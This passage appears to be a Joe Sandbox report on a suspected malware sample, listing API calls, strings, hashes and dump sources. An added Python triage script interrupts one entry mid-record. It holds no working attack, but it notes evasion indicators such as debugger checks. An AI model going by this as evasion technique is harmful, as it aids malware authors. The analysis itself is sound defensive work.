                                    • FindClose.KERNEL32(00000000), ref: 0035BADE
                                    • _swprintf.LIBCMT ref: 0035BB37
                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0035BB4A
                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0035BB67
                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0035BB87
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0035BB97
                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035BBB1
                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035BBC9
                                    • _swprintf.LIBCMT ref: 0035BBF5
                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0035BC08
                                    • _swprintf.LIBCMT ref: 0035BC5C
                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0035BC6F
                                      • Part of subcall function 0035A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035A662
                                      • Part of subcall function 0035A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E600,?,?), ref: 0035A6B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                    • API String ID: 797121971-1840816070
                                    • Opcode ID: b09b8c9b2110b61bf3569cff6ed7799f2fdfa4632213494a223906ac5e9519b0
                                    • Instruction ID: ea0c88d580c9cbe880e0aea84576214f3d355f7c12614780b8c56576312a63be
                                    • Opcode Fuzzy Hash: b09b8c9b2110b61bf3569cff6ed7799f2fdfa4632213494a223906ac5e9519b0
                                    • Instruction Fuzzy Hash: E19195B2548348BBD632DBA4DC49FFBB7ECEB4A701F040819FB49D6091D775A6088762
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347191
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003472F1
                                    • CloseHandle.KERNEL32(00000000), ref: 00347301
                                      • Part of subcall function 00347BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347C04
                                      • Part of subcall function 00347BF5: GetLastError.KERNEL32 ref: 00347C4A
                                      • Part of subcall function 00347BF5: CloseHandle.KERNEL32(?), ref: 00347C59
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0034730C
                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0034741A
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00347446
                                    • CloseHandle.KERNEL32(?), ref: 00347457
                                    • GetLastError.KERNEL32 ref: 00347467
                                    • RemoveDirectoryW.KERNEL32(?), ref: 003474B3
                                    • DeleteFileW.KERNEL32(?), ref: 003474DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                    • API String ID: 3935142422-3508440684
                                    • Opcode ID: cd6596c1e3d18927016ca96e0a7485f5ac588f176ef1e79f88060b73e3000e80
                                    • Instruction ID: b7badd5d23880b58ff0d81466a1813ccff0798f8ed337cfac9111f30968e622d
                                    • Opcode Fuzzy Hash: cd6596c1e3d18927016ca96e0a7485f5ac588f176ef1e79f88060b73e3000e80
                                    • Instruction Fuzzy Hash: 0BB1C071904215ABDF26DFA4DC45BEE77B8AF04300F0445A9F94AEB242D734BA49CBA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog_memcmp
                                    • String ID: CMT$h%u$hc%u
                                    • API String ID: 3004599000-3282847064
                                    • Opcode ID: 0fb1a68531f578c2049893cceacf0d26b580af156efb025c521ff3d893928150
                                    • Instruction ID: 3f4c6d874b795e4d0c46327565e861c1c8c88c8b80d09641d5d0dc3b779afab5
                                    • Opcode Fuzzy Hash: 0fb1a68531f578c2049893cceacf0d26b580af156efb025c521ff3d893928150
                                    • Instruction Fuzzy Hash: 6F32A1715152849FDF16DF64C886AEA37E5AF15300F09447EFD8A8F282DB74BA48CB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: c0af422a8f3425b8c2dc9352699ce56deba3620a55635d3d4f58cb4cee0fe66a
                                    • Instruction ID: ab9587bbe750655c0fad0fc2c5e220d6626f71d26c502907a8299ce99529d873
                                    • Opcode Fuzzy Hash: c0af422a8f3425b8c2dc9352699ce56deba3620a55635d3d4f58cb4cee0fe66a
                                    • Instruction Fuzzy Hash: 0BC26E75E086288FDB26CF28DD407E9B7B9EB45304F1585EAD80DE7248E774AE858F40
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 003427F1
                                    • _strlen.LIBCMT ref: 00342D7F
                                      • Part of subcall function 0035137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034B652,00000000,?,?,?,00010420), ref: 00351396
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00342EE0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                    • String ID: CMT
                                    • API String ID: 1706572503-2756464174
                                    • Opcode ID: 629680e97494bc20610b5a532d51aa84e7feefa00e04b8580eee8dcdb8d01b22
                                    • Instruction ID: b76f71ffd79a6306c8aaf389609c2ab55acc4d1dbfad641b303034b482e10784
                                    • Opcode Fuzzy Hash: 629680e97494bc20610b5a532d51aa84e7feefa00e04b8580eee8dcdb8d01b22
                                    • Instruction Fuzzy Hash: C162D0719102448FDB2ADF24C885AEA3BE5EF55300F49457DFC9A9F282DB70B949CB60
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00368767
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00368771
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0036877E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a5a63929f825f3364865f15540a0a10de2d1704f5a96dc42372d062a641ede0e
                                    • Instruction ID: 23731a1a58e28823ab55fe0a4d5bdd716a1af4e3518abf857ed1985e2cd1ab64
                                    • Opcode Fuzzy Hash: a5a63929f825f3364865f15540a0a10de2d1704f5a96dc42372d062a641ede0e
                                    • Instruction Fuzzy Hash: 1731C8759012289BCB22DF64D889B9CB7B8BF08311F5041EAE91CA7251EB709F858F45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: 46e1eaf15385d636a93531f23ac87bab09f15dbb32ce0d652d3ef4d827be63a8
                                    • Instruction ID: 7689236f40a69670680f259f642ae27045d9a9c71e1c03267a0f5a294d711331
                                    • Opcode Fuzzy Hash: 46e1eaf15385d636a93531f23ac87bab09f15dbb32ce0d652d3ef4d827be63a8
                                    • Instruction Fuzzy Hash: 8E313571800209AFCB269E79CC84EFB7BBEDB85314F0581A8F518E7255E6709D44CF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                    • Instruction ID: 46b70cfdbd9fcf2c421746e778a27878f41b6946913cd965ff4631ee44b41642
                                    • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                    • Instruction Fuzzy Hash: FE022C71E102199BDF15CFA9C8806ADFBF1FF48314F25816AD959EB384D731AE418B90
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035A662
                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E600,?,?), ref: 0035A6B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FormatInfoLocaleNumber
                                    • String ID:
                                    • API String ID: 2169056816-0
                                    • Opcode ID: 9a7b0a8d424731ca113591445497f70ea07e84d9e425321a0896abc15b120ea8
                                    • Instruction ID: d44c6e4cc954d35c48510b1aabb65efdd8a94a4a8f1113dcd751123efc1ae276
                                    • Opcode Fuzzy Hash: 9a7b0a8d424731ca113591445497f70ea07e84d9e425321a0896abc15b120ea8
                                    • Instruction Fuzzy Hash: 4F017136500208BFEB22DF64DC05F9B77BCEF19711F504462FA48A7150D7719A54CBA5
                                    APIs
                                    • GetLastError.KERNEL32(0035117C,?,00000200), ref: 00346EC9
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00346EEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: b83ae7ce567f8ef18b7e734063f59ceba7c57028ba46cb0f97100f1d2ec37ab6
                                    • Instruction ID: 5b03f0a623829623d4f1f2a01f8bc6b007d2ca886122eddefa65af30719c242c
                                    • Opcode Fuzzy Hash: b83ae7ce567f8ef18b7e734063f59ceba7c57028ba46cb0f97100f1d2ec37ab6
                                    • Instruction Fuzzy Hash: E5D0C7353C4306BFEA220E74CD06F677BDCB756B82F108514B357DD4D0C5709055A616
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037118F,?,?,00000008,?,?,00370E2F,00000000), ref: 003713C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 20112ba44c0f3b2576622513020dcdc8f725ff35163fbb3d538f8aca6f9aca28
                                    • Instruction ID: 6dc5fb54cba43f2bb69c88977cd7d85061754c678e5edb8124833869d436b6f0
                                    • Opcode Fuzzy Hash: 20112ba44c0f3b2576622513020dcdc8f725ff35163fbb3d538f8aca6f9aca28
                                    • Instruction Fuzzy Hash: 9AB12D366106099FD726CF2CC486B657BE0FF45364F66C658E999CF2A2C339D981CB40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gj
                                    • API String ID: 0-4203073231
                                    • Opcode ID: 92e3851dc456a9e0d04a3cc39ea8a8e9b25b5c5c4257d403ed4c6e867446cccf
                                    • Instruction ID: 8899b764c756460a09df4a63fb09996be56680ad91848fa28fd77a4880eadcb0
                                    • Opcode Fuzzy Hash: 92e3851dc456a9e0d04a3cc39ea8a8e9b25b5c5c4257d403ed4c6e867446cccf
                                    • Instruction Fuzzy Hash: D7F1D2B2A083418FC358CF29D890A1AFBE1BFCC208F15892EF598D7751E734E9459B56
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Version
                                    • String ID:
                                    • API String ID: 1889659487-0
                                    • Opcode ID: c14ffbf6177115bb44aacf83af3e5f9e70203f6117c3c6ff2d55cc21d5fa953b
                                    • Instruction ID: ee20745bedef5ad206f1c57a7411eb339ce95057b194cff281579c4e4c138f7c
                                    • Opcode Fuzzy Hash: c14ffbf6177115bb44aacf83af3e5f9e70203f6117c3c6ff2d55cc21d5fa953b
                                    • Instruction Fuzzy Hash: 9EF044B0D003088BCB6ACB18EC516E973A9BB49301F2042D9DA2987764D370A9848FA2
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0035EAC5), ref: 0035F068
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
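The "APIs" bullets in the function entries above (the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter sequence, the GetLocaleInfoW and GetNumberFormatW pair, GetLastError and FormatMessageW, RaiseException, GetVersionExW, and SetUnhandledExceptionFilter(Function_0001F070)) all use one line format. The Python below is an added triage helper, not code from the Joe Sandbox report or from the sample: it parses those bullets, converts each call-site address from the dump's virtual address to an RVA using the 00340000 image base stated in the Memory Dump Source lines, and applies a few labelled heuristics to each function's API set. The sample input is copied from the entries above; the tag names, the IMAGE_BASE constant and the heuristics themselves are this example's own assumptions.

```python
"""Parse the per-function "APIs" bullets of a Joe Sandbox report and tag
each function's API set.  Added example, not code from the report."""
import re

# Image base of the dumped module ("Offset: 00340000" in the report);
# call-site refs are VAs inside that image, so ref - base gives the RVA.
IMAGE_BASE = 0x00340000

# Report line format:  • Name.MODULE(arg,arg,...), ref: VVVVVVVV
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Sample input copied from the function entries above, keyed by the
# report's own Similarity "API ID" string for each entry.
SAMPLE_ENTRIES = {
    "ExceptionFilterUnhandled$DebuggerPresent": [
        "• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00368767",
        "• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00368771",
        "• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0036877E",
    ],
    "FormatInfoLocaleNumber": [
        "• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035A662",
        "• GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E600,?,?), ref: 0035A6B1",
    ],
    "ErrorFormatLastMessage": [
        "• GetLastError.KERNEL32(0035117C,?,00000200), ref: 00346EC9",
        "• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00346EEA",
    ],
    "ExceptionRaise": [
        "• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037118F,?,?,00000008,?,?,00370E2F,00000000), ref: 003713C1",
    ],
    "Version": [
        "• GetVersionExW.KERNEL32(?), ref: 0034AD1A",
    ],
    "ExceptionFilterUnhandled": [
        "• SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0035EAC5), ref: 0035F068",
    ],
}


def parse_api_line(line):
    """Return {api, module, args, ref, rva} for one API bullet, else None."""
    m = API_LINE.match(line)
    if m is None:
        return None  # an ID, hash or heading line, not an API call
    ref = int(m.group("ref"), 16)
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a for a in m.group("args").split(",") if a],
        "ref": ref,
        "rva": ref - IMAGE_BASE,
    }


def triage(calls):
    """Tag one function's API calls.  Heuristics for prioritising review,
    not verdicts; the tag names are this example's own."""
    names = {c["api"] for c in calls}
    tags = []
    if "IsDebuggerPresent" in names:
        tags.append("debugger-check")
    for c in calls:
        if c["api"] == "SetUnhandledExceptionFilter" and c["args"]:
            if c["args"][0] == "00000000":
                # NULL filter, then a direct UnhandledExceptionFilter call:
                # the same sequence the MSVC CRT uses on its fault-report
                # path, so alone this is weak evidence of anti-debugging.
                if "UnhandledExceptionFilter" in names:
                    tags.append("crt-fault-report-path")
            else:
                tags.append("custom-top-level-handler:" + c["args"][0])
        if c["api"] == "RaiseException" and c["args"] and c["args"][0].upper() == "C000000D":
            tags.append("raises-STATUS_INVALID_PARAMETER")
    if "GetVersionExW" in names:
        tags.append("os-version-query")
    if {"GetLastError", "FormatMessageW"} <= names:
        tags.append("error-text-formatting")
    if {"GetLocaleInfoW", "GetNumberFormatW"} <= names:
        tags.append("locale-number-formatting")
    return tags


def triage_report(entries):
    """Map each entry label to its tags; an entry with no parseable API
    bullet gets an empty list."""
    report = {}
    for label, lines in entries.items():
        calls = [c for c in (parse_api_line(ln) for ln in lines) if c]
        report[label] = triage(calls)
    return report


if __name__ == "__main__":
    for label, tags in triage_report(SAMPLE_ENTRIES).items():
        print(f"{label:45} {', '.join(tags) or '-'}")
    for label, lines in SAMPLE_ENTRIES.items():
        for c in filter(None, map(parse_api_line, lines)):
            print(f"  {c['api']:30} VA {c['ref']:08X}  RVA {c['rva']:05X}")
```

The RVA conversion is what lets a call site in these entries (for example ref 00368767) be located in the PE on disk or in another tool's listing, and the NULL-filter rule is deliberately conservative: the sandbox raises "Contains functionality to check if a debugger is running (IsDebuggerPresent)" on this three-call sequence, but the same sequence is emitted by the compiler's runtime, so the tag marks the function for a look rather than calling it evasion.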
                                    • Opcode ID: 2c4ac27dc59c446ef5fa039d38d731f05ae05846f97dab9997d949d63fd82034
                                    • Instruction ID: a9e778ee1155bcffce9ae5a58a4cb93f165dba186809d318f5b0a4868a5183e4
                                    • Opcode Fuzzy Hash: 2c4ac27dc59c446ef5fa039d38d731f05ae05846f97dab9997d949d63fd82034
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
